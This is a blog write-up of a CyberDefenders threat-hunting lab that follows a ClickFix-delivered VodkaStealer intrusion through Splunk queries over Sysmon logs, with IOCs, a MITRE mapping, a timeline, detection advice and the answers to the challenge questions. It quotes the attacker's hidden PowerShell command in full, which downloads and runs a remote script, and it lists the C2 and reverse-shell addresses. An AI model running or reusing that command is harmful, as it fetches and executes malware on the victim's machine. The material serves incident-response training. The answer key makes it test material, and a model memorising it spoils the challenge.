Incident Investigation Report: ClickFix - VodkaStealer — From Social Engineering to Full Network Compromise

Posted Jun 21, 2026

By El OMARI Zakaria

12 min read

Platform: CyberDefenders Challenge: ClickFix - VodkaStealer Category: Threat Hunting Difficulty: Medium Tools: Registry Explorer, Splunk, FTK Imager Achievement: Proof of Completion

1. Executive Summary

Incident Type: Social Engineering / Information Stealer / Lateral Movement / Data Exfiltration

Malware Family: VodkaStealer

A multi-stage intrusion was detected across the corporate network after anomalous PowerShell activity was flagged on workstation PAYOPS-WS-04. Investigation of Sysmon and Windows event logs via Splunk reconstructed a full attack chain: a user was socially engineered via a ClickFix-style attack to execute a malicious PowerShell command from their browser. The command downloaded and executed the VodkaStealer payload, which established a reverse shell, harvested browser credentials via LSASS memory access, created a persistent scheduled task, staged exfiltration data in a custom directory format, and ultimately pivoted to the file server COMP-FS-01 via PsExec-style lateral movement. A secondary machine (BCHAIN-WS-11) was also compromised using the same technique.

Indicators of Compromise (IOCs)

Type	Indicator	Description
Payload Staging URL	`http://3.122.229.6/payload.ps1`	PowerShell payload download URL
C2 / Exfiltration IP	`165.245.213.184`	Reverse shell and data exfiltration server
C2 Port (Reverse Shell)	`4444`	TCP port for reverse shell connections
C2 Port (Exfiltration)	`8443`	TCP port for VodkaStealer data exfiltration
Compromised Host (Primary)	`PAYOPS-WS-04`	First infected workstation
Compromised Host (Secondary)	`BCHAIN-WS-11`	Second workstation compromised via same technique
Compromised File Server	`COMP-FS-01`	Lateral movement target via PsExec
Compromised User	`NEXTGEN\n.hesham`	User who executed the ClickFix payload
Malicious Executable	`C:\Program Files\DataSync Pro\Sync.exe`	Dropped executable masquerading as legitimate software
Lateral Movement Tool	`2fdb156.exe` via `\\10.10.11.81\ADMIN$`	PsExec-style remote service creation
Scheduled Task	`\NextGen\DataSync Update`	Persistence mechanism executing `svc_update.exe`
Persistence Executable	`C:\ProgramData\svc_update.exe`	Payload executed by the scheduled task
Staging Directory Pattern	`sysinfo_{CountryCode}_{PublicIP}_{Date}`	VodkaStealer data staging format
Exfiltrated Data Files	`systeminfo.txt`, `InstalledSoftware.txt`	Host reconnaissance data collected for exfiltration
Targeted Browsers	`chrome`, `msedge`, `brave`, `opera`, `vivaldi`, `firefox`	Browsers killed for credential harvesting

MITRE ATT&CK Mapping Overview

Tactic	Technique	ID
Initial Access	Phishing: ClickFix Social Engineering	T1566
Execution	Command and Scripting Interpreter: PowerShell	T1059.001
Persistence	Scheduled Task/Job: Scheduled Task	T1053.005
Privilege Escalation	Scheduled Task running as NT AUTHORITY\SYSTEM	T1053.005
Defense Evasion	Masquerading: `DataSync Pro\Sync.exe`	T1036.005
Credential Access	OS Credential Dumping: LSASS Memory	T1003.001
Discovery	System Information Discovery	T1082
Lateral Movement	Remote Services: SMB/PsExec (`ADMIN$` share)	T1021.002
Collection	Data Staged: Local Data Staging	T1074.001
Exfiltration	Exfiltration Over C2 Channel (port 8443)	T1041
Impact	Browser Process Termination for DB Unlocking	T1489

ClickFix is a rapidly emerging social engineering vector that has become one of the most effective initial access techniques in 2025–2026. Unlike traditional phishing that relies on malicious attachments or links, ClickFix manipulates the user into executing a command themselves.

Stage	Description	Forensic Artifact
Lure Page	Victim visits a fake CAPTCHA, update prompt, or verification page	Browser history
Clipboard Injection	Page silently copies a malicious PowerShell command to the victim’s clipboard	JavaScript `navigator.clipboard.writeText()`
User Execution	Page instructs the user to press `Win+R` and paste the command	Sysmon EventCode 1 (`explorer.exe` → `powershell.exe`)
Payload Download	PowerShell downloads and executes the actual malware	Sysmon EventCode 3 (Network Connection)

Why This Matters: ClickFix bypasses email security gateways entirely — there is no malicious attachment or link in an email to scan. The attack happens in the browser, and the user voluntarily executes the command, making traditional email-based defenses completely irrelevant. The only effective controls are endpoint PowerShell logging, application whitelisting, and user awareness training specifically targeting clipboard-based attacks.

3. Phase 1: Initial Access — ClickFix Payload Delivery (Questions 1–3)

Objective: Identify the compromised host, the user who triggered the infection, and the initial payload delivery mechanism.

We begin by hunting for suspicious PowerShell activity across the environment. ClickFix attacks characteristically spawn PowerShell from explorer.exe (the Windows shell) rather than from cmd.exe or Office applications, because the user pastes the command into the Run dialog (Win+R).

Splunk Query:

index=* EventCode=1 CommandLine="*powershell*"
| search CommandLine="*hidden*" OR CommandLine="*iex*" OR CommandLine="*Download*" OR CommandLine="*enc*"
| table _time, host, ParentImage, CommandLine
| sort _time

The key event is immediately visible: at 2026-04-20 23:26:21, the user NEXTGEN\n.hesham on PAYOPS-WS-04 executed a PowerShell cradle directly from explorer.exe. The parent process being explorer.exe confirms this was triggered via the Run dialog — the signature of a ClickFix attack.

Narrowing our search to isolate the exact DownloadString commands on the target host:

Splunk Query:

index=* EventCode=1 host="PAYOPS-WS-04" CommandLine="*DownloadString*"
| table _time, User, CommandLine, ParentImage
| sort _time

$Splunk results showing 2 events on PAYOPS-WS-04. Both executed by NEXTGEN\n.hesham from C:\Windows\explorer.exe at 23:26:21 and 23:53:49. The command is: powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://3.122.229.6/payload.ps1')" — confirming the ClickFix payload URL and the fact the user executed it twice.$

The user executed the payload twice — at 23:26:21 and 23:53:49 — suggesting either the first attempt failed or the user was re-directed to the ClickFix page a second time. The command uses -nop (no profile), -w hidden (hidden window), and IEX (Invoke-Expression) — all classic evasion flags.

Answer Q1

What is the hostname of the first compromised workstation?

PAYOPS-WS-04

Answer Q2

What user executed the malicious command?

n.hesham

Answer Q3

What URL was used to download the initial payload?

http://3.122.229.6/payload.ps1

4. Phase 2: Execution & Persistence (Questions 4–6)

Objective: Identify the malware dropped to disk, the persistence mechanism established, and the executable it launches.

Dropped Executable Identification

After the PowerShell payload executes, we track file creation events (Sysmon EventCode 11) on the compromised host to identify what was written to disk:

Splunk Query:

index=* EventCode=11 host="PAYOPS-WS-04" TargetFilename="*.exe"
| table _time, Image, TargetFilename, User
| sort _time

$Splunk file creation events on PAYOPS-WS-04 showing PowerShell dropping C:\Program Files\DataSync Pro\Sync.exe at 2026-04-21 00:00:38 — a malicious executable masquerading as legitimate synchronization software in the Program Files directory.$

PowerShell drops Sync.exe into C:\Program Files\DataSync Pro\ — a directory name carefully chosen to look like legitimate enterprise synchronization software. Placing the file in Program Files rather than %TEMP% or AppData adds additional credibility and may bypass rules that flag executable creation in temporary directories.

Scheduled Task Persistence

To survive reboots, the malware creates a Windows Scheduled Task. We hunt for task creation events (EventCode 4698):

Splunk Query:

index=* EventCode=4698 host="PAYOPS-WS-04"
| table _time, TaskName, Command
| sort _time

$Splunk results showing Scheduled Task creation events on PAYOPS-WS-04. The task \NextGen\DataSync Update was created repeatedly starting at 2026-04-21 00:53:06, running every few minutes.$

Examining the task XML in the EventData reveals the full persistence configuration:

$Splunk EventData_Xml for EventCode 4698 showing the full task definition. The TaskName is \NextGen\DataSync Update. The command executes C:\ProgramData\svc_update.exe with NT AUTHORITY\SYSTEM privileges. The CalendarTrigger is set to start 2026-04-21T09:00:00 with daily recurrence. The highlighted executable path svc_update.exe is the persistence payload.$

The scheduled task \NextGen\DataSync Update:

Runs as NT AUTHORITY\SYSTEM — maximum privileges
Executes C:\ProgramData\svc_update.exe — a second binary stored in a common, non-suspicious location
Triggers daily with a CalendarTrigger starting at 09:00:00

Analyst Note: The task name \NextGen\DataSync Update uses the company’s own name (NextGen) as a namespace — a clever social engineering trick against SOC analysts reviewing scheduled tasks. Always verify scheduled tasks against a known-good baseline, and alert on any task running executables from C:\ProgramData\ as SYSTEM.

Answer Q4

What executable was dropped to disk to masquerade as legitimate software?

C:\Program Files\DataSync Pro\Sync.exe

Answer Q5

What is the name of the scheduled task created for persistence?

\NextGen\DataSync Update

Answer Q6

What executable does the scheduled task launch?

svc_update.exe

5. Phase 3: Credential Access & Data Collection (Questions 7–9)

Objective: Identify the credential harvesting technique, targeted browsers, and data staging methodology.

LSASS Memory Access — Credential Dumping

A critical indicator of post-exploitation is access to the LSASS (Local Security Authority Subsystem Service) process. Sysmon EventCode 10 (Process Access) logs reveal which processes attempted to read LSASS memory:

Splunk Query:

index=* EventCode=10 host="PAYOPS-WS-04" TargetImage="*lsass.exe"
| table _time, SourceImage, TargetImage, GrantedAccess
| sort _time

The critical finding: rundll32.exe accesses lsass.exe with GrantedAccess = 0x1fffff — this is PROCESS_ALL_ACCESS, the highest privilege level and a classic indicator of credential dumping tools like Mimikatz. The repeated 0x1010 accesses (PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ) preceding the full dump suggest the attacker was staging their access before performing the full extraction.

VodkaStealer Browser Kill & Data Collection

PowerShell Script Block Logging (EventCode 4104) captures the full VodkaStealer source code, revealing its operational phases:

$Splunk ScriptBlockText showing VodkaStealer Phase B (Browser Kill): the function Invoke-BrowserKill targets an array of browsers including chrome, msedge, brave, opera, vivaldi, browser, and firefox using taskkill to force-close them. Phase C (Staging Directory) creates a custom directory named using the format sysinfo_{CountryCode}_{PublicIP}_{Date}.$

$Splunk ScriptBlockText showing VodkaStealer's staging directory function creating directories named sysinfo_{CountryCode}_{PublicIP}_{Day:D2}_{Month:D2}_{Year}{Hour:D4}{Minute:D2} using the victim's public IP and country code for unique identification. Phase D Data Collection function begins below.$

VodkaStealer’s operational phases:

Phase A: Pre-flight checks (geolocation, mutex)
Phase B: Browser kill — terminates chrome, msedge, brave, opera, vivaldi, and firefox to unlock browser SQLite databases for credential extraction
Phase C: Staging directory creation using the format sysinfo_{CountryCode}_{PublicIP}_{DateTime}
Phase D: Data collection — systeminfo.txt, InstalledSoftware.txt, browser credentials

The staging directory naming convention is forensically significant: it embeds the victim’s country code and public IP directly into the folder name, allowing the attacker to automatically organize exfiltrated data from multiple victims.

Exfiltrated Data Files

Tracking file creation for the staging directory pattern confirms what data was collected:

Splunk Query:

index=* EventCode=11 host="PAYOPS-WS-04" TargetFilename="*sysinfo_US_10.0.0.1*"
| table _time, TargetFilename
| sort _time

$Splunk file creation events showing 8 files created in C:\Windows\Temp\sysinfo_US_10.0.0.1_210420260133 and a second directory at _210420260137. Each directory contains systeminfo.txt, InstalledSoftware.txt, and a .zip archive of the same name — confirming data staging, compression, and exfiltration preparation.$

Answer Q7

What credential dumping technique was used, and what was the GrantedAccess value?

0x1fffff

Answer Q8

What browsers does VodkaStealer target for credential harvesting?

chrome, msedge, brave, opera, vivaldi, firefox

Answer Q9

What is the staging directory naming pattern used by VodkaStealer?

sysinfo_{CountryCode}_{PublicIP}_{Date}

6. Phase 4: C2 Communication & Lateral Movement (Questions 10–12)

Objective: Identify the C2 infrastructure, exfiltration channels, and lateral movement to additional hosts.

Reverse Shell & Exfiltration Infrastructure

Network connection events (Sysmon EventCode 3) reveal the attacker’s C2 infrastructure:

Splunk Query:

index=* EventCode=3 DestinationIp="165.245.213.184"
| table _time, host, DestinationIp, DestinationPort
| sort _time

The C2 server at 165.245.213.184 receives connections on port 4444 (reverse shell) from both PAYOPS-WS-04 and BCHAIN-WS-11 — confirming the attack spread to a second workstation.

The VodkaStealer source code (captured via Script Block Logging) reveals a separate exfiltration channel:

The exfiltration uses port 8443 — a different port from the reverse shell (4444), separating C2 control traffic from data theft traffic.

Lateral Movement via PsExec to File Server

The attacker pivoted from PAYOPS-WS-04 to the file server COMP-FS-01 using PsExec-style lateral movement. Service creation events (EventCode 7045/4697) on the file server reveal the execution:

Splunk Query:

index=* host="COMP-FS-01" (EventCode=7045 OR EventCode=4697)
| table _time, ServiceName, ImagePath
| sort _time

$Splunk service creation events on COMP-FS-01 showing a new service named 2fdb156 created at 2026-04-21 00:30:45 with ImagePath \10.10.11.81\ADMIN$\2fdb156.exe — the classic PsExec lateral movement pattern using the ADMIN$ administrative share from the attacker's pivot point at 10.10.11.81.$

The service name 2fdb156 with the ImagePath pointing to \\10.10.11.81\ADMIN$\2fdb156.exe is the textbook PsExec pattern: an executable is copied to the target’s ADMIN$ share and then registered as a temporary Windows service for remote execution.

Tracking the execution on the file server confirms the full lateral movement chain:

$Splunk events on COMP-FS-01 showing 57 events related to 2fdb156.exe. EventCode 11 shows C:\Windows\2fdb156.exe dropped to disk by System. EventCode 7 shows the image loaded from \10.10.11.81\ADMIN$\2fdb156.exe. EventCode 1 shows rundll32.exe spawned. EventCode 13 shows registry modifications. EventCode 17/18 show named pipe communication — all confirming successful PsExec-style remote execution.$

Analyst Note: PsExec-style lateral movement leaves distinct forensic artifacts: a new service with a random name, an executable in C:\Windows\ or via ADMIN$, and named pipe communication. Create detection rules for EventCode 7045 where ServiceName is a short random string and ImagePath contains ADMIN$ — this is almost never legitimate.

Answer Q10

What is the attacker’s C2 IP address and reverse shell port?

165.245.213.184:4444

Answer Q11

What is the hostname of the second compromised workstation?

BCHAIN-WS-11

Answer Q12

What executable was used for lateral movement to the file server, and from which source IP?

2fdb156.exe from 10.10.11.81

7. Reconstructed Incident Timeline

Based on Sysmon and Windows event log analysis in Splunk, we can reconstruct the complete attack chain:

Date	Time	Kill Chain Phase	Action	Evidence Source
2026-04-20	23:26:21	Initial Access	`n.hesham` executes ClickFix PowerShell payload from `explorer.exe` on `PAYOPS-WS-04`	Sysmon EventCode 1
2026-04-20	23:26:21	Execution	`payload.ps1` downloaded from `http://3.122.229.6/payload.ps1`	Sysmon EventCode 3
2026-04-20	23:31:19	C2	First reverse shell connection to `165.245.213.184:4444`	Sysmon EventCode 3
2026-04-21	00:00:38	Installation	`C:\Program Files\DataSync Pro\Sync.exe` dropped to disk	Sysmon EventCode 11
2026-04-21	00:16:52	Credential Access	`rundll32.exe` accesses LSASS with `0x1fffff` (PROCESS_ALL_ACCESS)	Sysmon EventCode 10
2026-04-21	00:30:45	Lateral Movement	PsExec-style `2fdb156.exe` service created on `COMP-FS-01` via `ADMIN$`	EventCode 7045
2026-04-21	00:53:06	Persistence	Scheduled Task `\NextGen\DataSync Update` created executing `svc_update.exe` as SYSTEM	EventCode 4698
2026-04-21	01:33:44	Collection	VodkaStealer collects `systeminfo.txt`, `InstalledSoftware.txt`, browser data	Sysmon EventCode 11
2026-04-21	01:33:49	Exfiltration	Data exfiltrated to `165.245.213.184:8443`	Sysmon EventCode 3
2026-04-21	01:51:27	Lateral Movement	`BCHAIN-WS-11` connects to C2 — second host compromised	Sysmon EventCode 3

Key Observation: The attack progressed from initial access to credential dumping in under 51 minutes, and to lateral movement in under 65 minutes. The attacker’s use of two separate C2 channels — port 4444 for shell access and port 8443 for data exfiltration — demonstrates operational discipline. The VodkaStealer payload’s automatic country code and public IP tagging in staging directories indicates this is a scalable campaign targeting multiple organizations simultaneously.

8. Conclusion

The ClickFix - VodkaStealer investigation reconstructs a sophisticated, multi-phase intrusion from social engineering to full network compromise. Key findings:

Initial Access: ClickFix social engineering tricked n.hesham into executing a PowerShell cradle from explorer.exe, downloading payload.ps1 from 3.122.229.6.
Persistence: A scheduled task (\NextGen\DataSync Update) was created to execute svc_update.exe as SYSTEM on a daily schedule.
Credential Theft: LSASS memory was accessed with PROCESS_ALL_ACCESS (0x1fffff) via rundll32.exe for credential extraction.
Data Exfiltration: VodkaStealer staged system info, installed software, and browser credentials in uniquely named directories, then exfiltrated via port 8443.
Lateral Movement: PsExec-style execution via ADMIN$ share compromised the file server COMP-FS-01, and a second workstation (BCHAIN-WS-11) was also infected.
Scope: At least 3 systems confirmed compromised across the environment.

Key Takeaways for the SOC:

Block ClickFix at the endpoint — Deploy application control policies that prevent powershell.exe from being spawned by explorer.exe with -hidden and IEX flags. This parent-child process relationship is almost never legitimate.
Alert on LSASS access with 0x1fffff — Any process accessing lsass.exe with PROCESS_ALL_ACCESS is a critical indicator of credential dumping. This should trigger an immediate P1 alert in any SIEM.
Monitor for PsExec artifacts — EventCode 7045 (Service Installation) with randomized service names and ADMIN$ image paths should be flagged as lateral movement indicators.
Hunt for VodkaStealer staging patterns — Search for file creation events matching sysinfo_* in %TEMP% or C:\Windows\Temp\ directories across all endpoints.

Analysis Date: June 21, 2026 Analyst: El OMARI Zakaria

CTF Write-ups, Endpoint Forensics, Incident Response

This post is licensed under CC BY 4.0 by the author.

1. Executive Summary

Indicators of Compromise (IOCs)

MITRE ATT&CK Mapping Overview

2. Background: The ClickFix Social Engineering Technique

3. Phase 1: Initial Access — ClickFix Payload Delivery (Questions 1–3)

Answer Q1

Answer Q2

Answer Q3

4. Phase 2: Execution & Persistence (Questions 4–6)

Dropped Executable Identification

Scheduled Task Persistence

Answer Q4

Answer Q5

Answer Q6

5. Phase 3: Credential Access & Data Collection (Questions 7–9)

LSASS Memory Access — Credential Dumping

VodkaStealer Browser Kill & Data Collection

Exfiltrated Data Files

Answer Q7

Answer Q8

Answer Q9

6. Phase 4: C2 Communication & Lateral Movement (Questions 10–12)

Reverse Shell & Exfiltration Infrastructure

Lateral Movement via PsExec to File Server

Answer Q10

Answer Q11

Answer Q12

7. Reconstructed Incident Timeline

8. Conclusion

Trending Tags